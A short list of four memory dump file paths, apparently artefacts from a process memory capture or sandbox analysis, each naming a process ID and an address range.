memory/2244-4-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/3056-8-0x0000000000400000-0x000000000042B000-memory.dmp
memory/2244-10-0x0000000000400000-0x0000000000420000-memory.dmp
memory/2244-27-0x0000000000400000-0x0000000000420000-memory.dmp